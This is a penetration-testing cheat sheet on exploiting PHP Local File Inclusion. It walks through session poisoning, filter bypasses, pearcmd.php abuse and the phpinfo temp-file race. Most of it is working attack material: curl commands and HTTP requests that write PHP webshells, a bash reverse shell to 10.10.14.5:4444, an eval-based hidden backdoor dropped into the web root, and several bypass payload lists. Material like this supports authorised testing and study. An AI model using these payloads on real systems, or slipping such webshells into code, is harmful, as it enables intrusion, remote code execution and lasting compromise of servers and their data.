LFI

Local File Inclusion

Writable directories to target

/tmp/
/var/tmp/
/dev/shm/
/var/www/html/uploads/

Path Traversal

Linux Standard

../../../../../../../../../

Windows Standard

..\..\..\..\..\

File Signatures

• List of file signatures

Reads the first 16 bytes of a file and displays them in a hexadecimal format with ASCII representation:

file myfile && head -c 16 myfile | xxd

Converts the entire file into plain hex and extracts the first line:

xxd -p filename | head -n 1 

Session File Inclusion

Session files can be leveraged for LFI to RCE by poisoning session data.

Default locations:

/var/lib/php/sessions/sess_[SESSION_ID]
/var/lib/php5/sessions/sess_[SESSION_ID]
/tmp/sess_[SESSION_ID]
/var/tmp/sess_[SESSION_ID]

Step 1: Inject Malicious Payload

POST /login.php HTTP/1.1
Cookie: PHPSESSID=abc123

username=<?php system($_GET['cmd']); ?>
password=anything

Step 2: Include Session File via LFI

http://target.com/index.php?page=/var/lib/php/sessions/sess_abc123&cmd=id

Alternative: Create Your Own Session

Some applications allow you to set arbitrary session variables

If there's a page like profile.php that saves to session

http://target.com/profile.php?lang=<?php system($_GET['cmd']); ?>

Then include it

http://target.com/vuln.php?file=/tmp/sess_YOUR_SESSION_ID&cmd=whoami

Session File Format

Session files use a serialized format:

key|value

Example:

username|s:7:"hacker";preferences|s:2:"en";

After injection:

username|s:30:"<?php system($_GET['cmd']); ?>";

Custom Session Path

If you control session.save_path:

PHP code to set custom path

ini_set('session.save_path', '/tmp/');
session_start();
$_SESSION['exploit'] = '<?php system("id"); ?>';

Then include

http://target.com/page.php?file=/tmp/sess_SESSIONID

The %00 Null Terminator

This only works on PHP < 5.3.4 due to the Magic Quotes fix

Is often used to terminate a string prematurely, effectively allowing attackers to manipulate the filename or file extension.

In C-based languages (which PHP is written in), strings are null-terminated. The \0 character signals the end of a string.

# Application code:
include($_GET['file'] . '.php');

# Attack:
?file=../../../etc/passwd%00

# What PHP sees (before 5.3.4):
include('../../../etc/passwd\0.php');
# String terminates at \0, ignoring .php

Filter Bypasses

Encoding Bypasses

Double Encoding:

# Normal: ../
# URL encoded: %2e%2e%2f
# Double encoded: %252e%252e%252f

http://target.com/page.php?file=%252e%252e%252fetc%252fpasswd

UTF-8 Encoding:

../ = %c0%ae%c0%ae%c0%af
../ = %e0%40%ae%e0%40%ae%e0%40%af

16-bit Unicode Encoding:

../ = %u002e%u002e%u002f

Extension Appending Bypasses

Many applications append .php automatically.

Null Byte Terminator (PHP < 5.3.4):

?file=../../../etc/passwd%00
?file=../../../etc/passwd%00.jpg

Path Truncation (PHP < 5.3) PHP has a maximum path length. Exploit this by adding enough characters:

?file=../../../etc/passwd/././././././.[ADD ~2048 chars]/././.
?file=../../../etc/passwd/....//....//....//[repeat]

Using Dots:

?file=../../../etc/passwd..............[add many dots]
?file=../../../etc/passwd/./././././././.[add many]

Zip/Compress Tricks

Even if .php is appended, the fragment (#) stops it

?file=zip:///tmp/upload.zip%23shell.txt

Keyword Filter Bypasses

Case Variations:

../ = ..\/
../ = ..\

Mixed Encoding:

..%2f = ..%5c
..%252f

Stripped Substring Bypass

....//
..../
....\
....\/

Double Encoding for Strips If '../' is stripped once:

....//....//....//etc/passwd

Wrapper Filter Bypasses

Case Insensitivity:

PHP://filter/
Php://FILTER/
pHp://FiLtEr/

Whitespace Injection:

php:// filter/
php://  filter/

Alternative Separators:

php://filter|convert.base64-encode|resource=index.php

Blacklist Bypasses

If /etc/passwd is blacklisted:

/etc/./passwd
/etc/passwd/.
/etc/pass??
/etc/p*sswd
/e?c/?asswd

If ../ is blocked, use absolute paths:

/var/www/html/config.php
/var/log/apache2/access.log

Using Glob Patterns (depends on implementation):

?file=/etc/p[a]sswd
?file=/etc/p?sswd

Chaining

• If it's possible to access logs try Log Poisoning

LFI to RCE via pearcmd.php

PHP PEAR is a package manager that often comes installed by default on Linux systems.

It includes a script (pearcmd.php) designed to run command-line tasks.

We can pass arguments to the script via the URL query string (?+argument), allowing us to write arbitrary content to files.

Requires: register_argc_argv=On (enabled by default in most PHP configs)

Find the path to PEAR

Common Locations

/usr/share/pear/pearcmd.php
/usr/local/share/pear/pearcmd.php
/usr/share/php/PEAR/pearcmd.php
/usr/share/php/pearcmd.php
/usr/lib/php/pear/pearcmd.php
/usr/local/lib/php/pearcmd.php
/opt/php/lib/php/pearcmd.php
/usr/lib/php/pear/pearcmd.php
/usr/local/lib/php/pear/pearcmd.php
/Applications/MAMP/bin/php/phpX.X.X/lib/php/pearcmd.php
C:\php\pear\pearcmd.php
C:\Program Files\PHP\pear\pearcmd.php
C:\xampp\php\pear\pearcmd.php

Check PEAR configuration

pear config-get php_dir

use PHP to find it

php -r "echo get_include_path();"

Locate pear executable

which pear

Create a "Config" file containing your payload

Use the config-create command. The script takes two arguments: the "content" (which we pretend is a directory path) and the output filename.

Example:

?+config-create+/&file=/usr/share/pear/pearcmd.php&/<?=system($_GET['cmd']);?>+/tmp/cmd.php

• Sometimes you need .php in the path: /tmp/shell.php

• Sometimes app adds it automatically, use: /tmp/shell

Test if PEAR exists and works

curl "http://target/vuln.php?file=../../../../usr/share/pear/pearcmd&+config-create+/&/TEST+/tmp/test.txt"

Encode payload

echo -n "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" | xxd -p | tr -d '\n'

Write webshell via PEAR

curl "http://target/page.php?file=../../../../usr/share/pear/pearcmd&+config-create+/&/<?=system(hex2bin('HEX_HERE'))?>+/tmp/shell.php"

Trigger the shell

curl "http://target/tmp/shell.php"

Direct parameter

curl "http://site.com/page.php?file=../../../../usr/share/pear/pearcmd&+config-create+/&/<?=system('id')?>+/tmp/shell.php"

Some app uses "lang" parameter

curl "http://site.com/index.php?lang=../../pear/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/info.php"

Full path in one parameter

curl "http://site.com/view.php?page=/usr/share/pear/pearcmd.php&+config-create+/&/<?=shell_exec(\$_GET[0])?>+/tmp/cmd.php"

Other PEAR commands

+install+     # Install package (can execute code)
+download+    # Download files
+run-scripts+ # Execute scripts

Insomnia Attack

This technique, published by Insomnia Security (Brett Moore, 2011), exploits a race condition to achieve Remote Code Execution through LFI by leveraging PHP's file upload mechanism and phpinfo() output.

When PHP processes a file upload, it temporarily stores the file in the system's temp directory (usually /tmp/) with a random name like /tmp/phpXXXXXX. This temporary file exists only while PHP is processing the request and is deleted immediately after.

The phpinfo() function displays all PHP variables, including uploaded file information with the temporary filename. By winning a race condition, we can:

1. Upload a malicious file via phpinfo()

2. Extract the temporary filename from phpinfo() output

3. Include that file via LFI before PHP deletes it

4. Achieve code execution

Requirements

1. LFI Vulnerability

   • Any local file inclusion vulnerability

   • Must be able to include files from /tmp/

2. PHPInfo() Page

   • Any accessible page that outputs phpinfo()

   • Common locations: /phpinfo.php, /info.php, /test.php

3. file_uploads = On

   • PHP configuration must allow file uploads

   • Check in phpinfo output under "Core" section

   • This is enabled by default in most PHP installations

Optional But Helpful

• Multiple threads - Increases success rate

• Low latency - Local network or fast connection improves odds

• No rate limiting - More attempts = higher success

PHP uses chunked transfer encoding for large responses. When phpinfo() output exceeds the buffer size (default 4096 bytes), we can receive partial content while PHP is still processing and the temporary file still exists.

The Padding Trick

To ensure phpinfo() exceeds the buffer threshold and slow down processing slightly:

• Add large HTTP headers

• Add URL query parameters

• Add cookie values

• Total padding: ~5000+ bytes per field

This increases processing time from microseconds to milliseconds, giving us a window to win the race.

Identifying Vulnerable Systems

Step 1: Find PHPInfo Page

Common locations

curl http://target.com/phpinfo.php
curl http://target.com/info.php
curl http://target.com/test.php
curl http://target.com/php.php
curl http://target.com/admin/phpinfo.php

Directory fuzzing

ffuf -u http://target.com/FUZZ.php -w /usr/share/wordlists/dirb/common.txt -mc 200 -fs 0

Step 2: Verify LFI Vulnerability

Test basic LFI

curl "http://target.com/index.php?page=../../../etc/passwd"

Test if /tmp/ is accessible

curl "http://target.com/index.php?page=../../../tmp/test"

Step 3: Check PHP Configuration

Look for in phpinfo() output:

file_uploads: On
upload_tmp_dir: /tmp (or empty - defaults to system temp)
upload_max_filesize: 2M (or higher)

Manual Exploitation

Understanding the Payload

The uploaded "file" contains:

<?php 
$c=fopen('/tmp/g','w');
fwrite($c,'<?php passthru($_GET["f"]);?>');
?>

This creates a persistent webshell at /tmp/g that we can access repeatedly without winning the race again.

Step 1: Craft the Upload Request

Create a file upload.txt:

POST /phpinfo.php?a=AAAAAAAAAAAAAAAA[... 5000 A's ...]AAAA HTTP/1.1
Host: target.com
Cookie: PHPSESSID=test123; othercookie=AAAAAAAAAA[... 5000 A's ...]AAAA
HTTP_ACCEPT: AAAAAAAAAAA[... 5000 A's ...]AAAA
HTTP_USER_AGENT: AAAAAAAA[... 5000 A's ...]AAAA
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714
Content-Length: 314

-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security Test
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
-----------------------------7dbff1ded0714--

Step 2: Send Request and Extract Temp Filename

Send the upload request

curl -i http://target.com/phpinfo.php -X POST \
  -F "file=@payload.php" \
  --header "User-Agent: AAAA[5000 A's]" \
  --header "Cookie: PHPSESSID=test; extra=AAA[5000 A's]" \
  2>&1 | grep -o 'tmp_name.*phpXXXXXX'

Look for in the output:

_FILES["dummyname"]
[name] => test.txt
[type] => text/plain
[tmp_name] => /tmp/phpABCDEF    ← THIS IS WHAT WE NEED
[error] => 0
[size] => 150

Step 3: Race to Include the File

While phpinfo() is still processing, immediately send:

curl "http://target.com/vuln.php?page=/tmp/phpABCDEF"

If successful, the shell is now persistent at /tmp/g:

curl "http://target.com/vuln.php?page=/tmp/g&f=id"

Automated Exploitation

Download the exploit from here

python3 phpinfolfi3.py target.com 80 20

Custom Payload Variations

Reverse Shell

<?php 
$c=fopen('/tmp/g','w');
fwrite($c,'<?php system("bash -c \'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\'"); ?>');
?>

Persistent Backdoor

<?php 
$c=fopen('/var/www/html/.shell.php','w');
fwrite($c,'<?php eval($_POST["x"]); ?>');
?>

Memory Resident (No File)

<?php 
eval(base64_decode($_GET['x']));
?>

Increasing Success Rate

1. Increase Thread Count

python3 phpinfolfi3.py target.com 80 50

2. Reduce Network Latency

• Run from a VPS in the same region/datacenter

• Use localhost if you have local access

3. Monitor Temp Directory

If you have some access to the system:

Watch temp file creation in real-time

inotifywait -m -r /tmp/ | grep php

4. Increase Padding

Modify the script to add even more padding:

Increase from 5000

padding = "A" * 10000

Alternative Temp Locations

If /tmp/ doesn't work, try:

/var/tmp/phpXXXXXX
/dev/shm/phpXXXXXX
/tmp/upload/phpXXXXXX

SecLists/Fuzzing/LFI at master · danielmiessler/SecListsGitHub

PayloadsAllTheThings/File Inclusion at master · swisskyrepo/PayloadsAllTheThingsGitHub